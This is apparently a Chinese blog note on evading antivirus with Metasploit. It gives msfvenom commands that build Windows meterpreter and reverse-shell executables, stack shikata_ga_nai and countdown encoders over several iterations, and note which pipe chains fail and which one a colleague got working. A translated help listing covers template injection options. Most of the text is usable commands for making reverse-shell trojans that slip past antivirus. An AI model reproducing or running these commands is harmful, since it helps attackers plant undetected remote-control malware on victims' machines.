Metasploit之反反病毒(免杀)
参考文献:https://zhidao.baidu.com/question/497442462224943404.html(msfvenom使用多种编码)
https://my.oschina.net/u/1585857/blog/500183(使用工具Veil生成木马,需安装)
http://www.evil0x.com/posts/9492.html(kali2.0-msfvenom 使用简介,比较详细)
实例如下:
------------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=192.168.2.14 | msfvenom -e x86/shikata_ga_nai -a x86 -platform windows -f exe > meter.exe
PS:出现错误--无效的有效负载选择
msfvenom -p windows/shell/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=192.168.2.146 | msfvenom -e x86/shikata_ga_nai -a x86 -platform windows -f exe > litteryi.exe
PS:出现错误--无效的有效负载选择
msfvenom -p windows/meterpreter/reverse_tcp -f raw LHOST=192.168.2.146 -e x86/shikata_ga_nai -a x86 -platform windows -f exe > meter.exe
PS:出现错误--选择了无效载荷
以上几种无效命令,需要进一步去解决,找出出错原因(关于管道命令“|”)
PS:后续有师兄测试了两天得出一个可行的管道命令,如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | /msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | /msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | /msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | /msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
------------------------------------------------------------------------------------------------
有效生成:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 R -e x86/shikata_ga_nai -i 3 -f exe -o shell.exe
PS:-i 使用同一种编码方式编码3次
-f 生成的文件格式
-o 生成文件路径,这里默认跟目录
命令解释:
-p 是选择payload 攻击载荷
-f 是输出文件格式这里是exe文件格式
-e 是选择您的编码器 选什么根据是什么系统来选
帮助文档:
-p,--payload <负载>负载使用。指定' - '或标准输入使用自定义负载
-l,--list [的module_type]列出一个模块类型。选项包括:有效载荷,编码器,空指令,所有
-n,--nopsled <长度> [长度]大小对有效载荷在前面加上nopsled
-f,--format <格式>输出格式(使用--help-格式列表)
-e,--encoder [编码器]编码器使用
-a,--arch <架构>的架构使用
--platform <平台>有效载荷的平台
-s,--space <长度>所得有效负载的最大尺寸
-b,--bad-字符<列表>字符列表,以避免例如:'/ X00 / XFF“
-i,--iterations <计数>的次数,以有效负载进行编码
-c,--add代码<路径>指定一个额外的win32 shellcode的文件,包括
-x,--template <路径>指定一个自定义的可执行文件作为模板使用
-k,--keep保存模板行为和有效载荷为一个新的线程注入
--payload-选项列表中的有效载荷的标准选项
-o,--out <路径>保存有效载荷
-v,--var名<名>指定用于某些输出格式的自定义变量名称
-h,--help显示此消息
--help-格式列出可用的格式
参考文献:http://www.evil0x.com/posts/9492.html(kali2.0-msfvenom 使用简介,比较详细)
PS:在kali-linux-1.0的时候,msfpayload可以使用,并且有msfencode的编码器,还能使用管道命令,
但是在kali-linux-2.0中这些都没有了。具体对于msf具有哪些功能,可以输入“msf”再两次tab键看详细
msfvenom -l -->列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论